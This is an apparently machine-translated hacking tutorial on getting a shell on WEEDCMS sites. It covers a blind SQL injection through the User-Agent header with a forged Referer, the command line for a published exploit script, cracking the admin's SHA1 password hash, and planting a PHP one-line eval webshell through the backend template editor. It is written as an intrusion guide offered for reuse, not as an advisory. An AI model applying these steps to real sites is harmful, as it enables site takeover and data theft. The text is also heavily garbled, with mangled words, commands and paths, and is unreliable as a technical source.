Using weeds to weedcmsuseragent blind holes to get shells

The Weed Web Management System (WEEDCMS) is a content management system developed by weeds independently based on Php+mysql. For enterprises, individuals, small portals and other medium-sized web site use and developed. Adopt the internationally popular Smarty engine and the Agile jquery JS framework.

On the tools.net saw someone announced the weedons user_agent blind hole, the vulnerability affects WEEDCMS 4 version 0 and the latest WEEDCMS v5. O build 20110101, let me introduce you to this vulnerability.

I. Simple analysis of vulnerabilities

The disclosure of this vulnerability is that Sswowo,sswowo has carried out a more detailed analysis, which is directly quoted here.

The vulnerable file is the Vote.php,user_ agent inserted directly into the database, without filtering, resulting in insert-type SQL injection. The blinds are only allowed due to no error prompts. The code is not specifically written down, there is a need to find me.

We can see that this function does not have any filtering on the data of the descendants, just the simple SQL statement generation and the last Call to query () execution.

First the program obtains the action variable through get, if AC tio n==ok. Then the polling is processed, and then the Checkrequest () function is called to validate the request, we follow up on this function and find the No. 390 line of includes/function.php.

We can see that a simple regular match is made to Referer only, and Xjho St is compared, and we can bypass this verification by forging a request for R-Wei Ferer.

Then the program gets the vote_id variable, we give him a non-existent ID, to prevent the program logic is interrupted in different target environment, then we look at the last insert voting data, directly obtained $_server[' http_user-agent '] And there is no filtering, and the $_SERVEFR variable is not protected by MAGIC_QUOTES_GPC, so the vulnerability is very versatile and can almost kill. Finally, using the $DB->INSERT0 function inserted into the database, we follow this function to see if there is no filtering. Find includes/class_db.php 第20-7 We can see that this function does not have any filtering on the data of the descendants, just the simple SQL statement generation, and the last Call to query () execution. Vulnerability analysis is a simple reference here, the following is the exploit process.

Two. Exploit

I downloaded the Weed weedcms latest version of the wild Leather content management system Weedc MS v5 from the Internet. o Build 20110101 of the source code, with Appserv in the virtual machine to run the program up.

User_agent Blind hole How to use it? Don't worry, Sswowo has given a loophole to the use of exp, the EXP code saved as weedcmsexp.php standby. Since exp is written in PHP code, PHP is required. EXE for parsing. Some friends may not know where Php.exe, installed PHP has, I build PHP Web environment with the Appserv _r ' PhpS, I will not have to install PHP, directly used. Appserv php5 in the installation directory is C:\APPSERV\PHP5, press the Win+r key on the keyboard to call "Run", enter CMD after you open the command prompt, enter C DVL:JJ to the C packing directory, and then enter the CD C:YAPPSERV\PHP5, Enter the directory in which to switch to PHP.EXEF. Copy the exploit exp weedcmsexp.php to the C:\APPSERV\PHP5 directory and enter PHP at the command prompt. Exeweedcmsexp.php will see Exi, how to use. The following 4 parameters are: Target host port program path (end with/start) delay. To inject the weedcms built into my virtual machine, enter PHP. EXE weedcmsexp.php127.0.0.1 "/weed/" "2", enter after you will see a line of information rolled over.

After injection is completed, guess the administrator's username is admin, password is d033 e22ae348aeb5660fc2140aec35850c4da997, password is shal encrypted, In the online hack site got the administrator's user name and password should go backstage to find a way to get the shell. WEEDCMS's background login file is the root directory of the site admin_.php, with the user name and password to get into the background smoothly.

Although WEEDCMS 4.0 and 5.0 can be injected, I will only get the shell after entering the WEEDCMS 5.0 background, for 4. o version of We edcms in the background did not find the way to take the shell, maybe I am too food, have to know how to take the shell welcome and I exchange. WEEDCMS 5.0 the way to get the shell in the background I was learning the heart of the weed Weedcms 5. 0 How to write a horse loophole. The specific use of the site after the WEEDCMS to add the following code: Admin.php?action=config&do=te mplate_edit&file=part__ vote.html, after access to open the page.

Is the Edit Template file page, insert <?eval ($ one post[x]) in the header of the file;? , after submitting a visit to the website home page, php-sentence Trojan will write to the temps/compile/directory part_vote.html.php file, with lanker-sentence PHP backdoor client 3. o The internal version of the connection gets the shell.

Although the weedcms is not very popular, but this loophole still have to pay attention to the place, such as the user agent blind method, if you have the ability to draw on the exploit exp code, I believe you will have something to gain.

Using weeds to weedcmsuseragent blind holes to get shells